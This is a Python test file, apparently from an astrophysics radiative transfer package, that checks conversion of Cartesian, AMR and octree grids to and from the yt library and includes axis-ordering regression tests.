from ...model.tests.test_helpers import get_realistic_test_dust
from .. import (CartesianGrid,
SphericalPolarGrid,
CylindricalPolarGrid,
AMRGrid,
OctreeGrid)
try:
import yt
except ImportError:
YT_VERSION = None
else:
if LooseVersion(yt.__version__) >= LooseVersion('3'):
YT_VERSION = 3
else:
YT_VERSION = 2
DATA = os.path.join(os.path.dirname(__file__), 'data')
ALL_GRID_TYPES = ['car', 'amr', 'oct']
@pytest.mark.skipif("YT_VERSION is None")
class TestToYt(object):
def setup_method(self, method):
# Set up grids
self.grid = {}
self.grid['car'] = CartesianGrid([-1., 1.],
[-2., 0., 2.],
[-3., -1., 1., 3.])
self.grid['cyl'] = CylindricalPolarGrid([0., 1.],
[-1., 0., 1.],
[0., 0.75 * np.pi, 1.25 * np.pi, 2. * np.pi])
self.grid['sph'] = SphericalPolarGrid([0., 0.5, 1.],
[0., np.pi],
[0., 0.75 * np.pi, 1.25 * np.pi, 2. * np.pi])
self.grid['amr'] = AMRGrid()
level = self.grid['amr'].add_level()
grid = level.add_grid()
grid.xmin, grid.xmax = -1., 1.
grid.ymin, grid.ymax = -1., 1.
grid.zmin, grid.zmax = -1., 1.
grid.nx, grid.ny, grid.nz = 8, 6, 4
refined = [1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0]
self.grid['oct'] = OctreeGrid(0., 0., 0., 10., 10., 10.,
np.array(refined).astype(bool))
# Set up initial densities
self.density = {}
self.density['car'] = np.ones((3, 2, 1))
self.density['cyl'] = np.ones((3, 2, 1))
self.density['sph'] = np.ones((3, 1, 2))
amr_q = deepcopy(self.grid['amr'])
amr_q.levels[0].grids[0].quantities['density'] = np.ones((4, 6, 8))
self.density['amr'] = amr_q['density']
self.density['oct'] = np.ones(len(refined))
@pytest.mark.parametrize(('grid_type'), ALL_GRID_TYPES)
def test_to_yt(self, tmpdir, grid_type):
from yt.mods import ProjectionPlot
g = self.grid[grid_type]
g['density'] = []
g['density'].append(self.density[grid_type])
pf = g.to_yt()
# TEMP: xfail due to bug in yt
# https://bitbucket.org/yt_analysis/yt/pull-requests/2362/fix-type-issue-in-octree-construction/diff
if grid_type == 'oct':
pytest.xfail()
p = ProjectionPlot(pf, 'x', ["density"], center='c', origin='native')
p.save(tmpdir.join('test.png').strpath)
@pytest.mark.skipif("YT_VERSION is None or YT_VERSION < 3")
def test_from_yt(tmpdir):
from yt import load
ds = load(os.path.join(DATA, 'DD0010', 'moving7_0010'))
def _dust_density(field, data):
return data["density"].in_units('g/cm**3') * 0.01
ds.add_field(("gas", "dust_density"), function=_dust_density, units='g/cm**3')
amr = AMRGrid.from_yt(ds, quantity_mapping={'density': ('gas', 'dust_density')})
m = Model()
m.set_amr_grid(amr)
m.add_density_grid(amr['density'], get_realistic_test_dust())
s = m.add_point_source()
s.luminosity = 1000
s.temperature = 1000
m.set_n_initial_iterations(3)
m.set_n_photons(initial=1e5, imaging=0)
m.set_propagation_check_frequency(1)
m.set_copy_input(False)
input_file = tmpdir.join('test.rtin').strpath
output_file = tmpdir.join('test.rtout').strpath
m.write(input_file)
m.run(output_file)
@pytest.mark.skipif("YT_VERSION is None")
def test_axis_ordering_cartesian():
# Regression test for axis ordering
from .yt_compat import get_frb
x = np.linspace(-1, 1, 9)
y = np.linspace(-2, 2, 17)
z = np.linspace(-3, 3, 33)
density = np.arange(32)[:, None, None] * np.ones((32, 16, 8))
g = CartesianGrid(x, y, z)
g['density'] = []
g['density'].append(density)
from yt.mods import ProjectionPlot, SlicePlot
pf = g.to_yt()
for iz, z in enumerate(g.z):
prj = SlicePlot(pf, 'z', ['density'], center=[0.0, 0.0, z])
np.testing.assert_allclose(get_frb(prj, 'density').min(), iz)
np.testing.assert_allclose(get_frb(prj, 'density').max(), iz)
@pytest.mark.skipif("YT_VERSION is None")
def test_axis_ordering_amr():
# Regression test for axis ordering
from .yt_compat import get_frb
g = AMRGrid()
level = g.add_level()
grid = level.add_grid()
grid.xmin, grid.xmax = -1, 1
grid.ymin, grid.ymax = -2, 2
grid.zmin, grid.zmax = -3, 3
grid.nx, grid.ny, grid.nz = 8, 16, 32
grid.quantities['density'] = []
grid.quantities['density'].append(np.arange(grid.nz)[:, None, None] * np.ones((grid.nz, grid.ny, grid.nx)))
from yt.mods import ProjectionPlot, SlicePlot
pf = g.to_yt()
zw = np.linspace(-3, 3, 33)
zcen = 0.5 * (zw[1:] + zw[:-1])
for iz, z in enumerate(zcen):
prj = SlicePlot(pf, 'z', ['density'], center=[0.0, 0.0, z])
np.testing.assert_allclose(get_frb(prj, 'density').min(), iz)
np.testing.assert_allclose(get_frb(prj, 'density').max(), iz)
|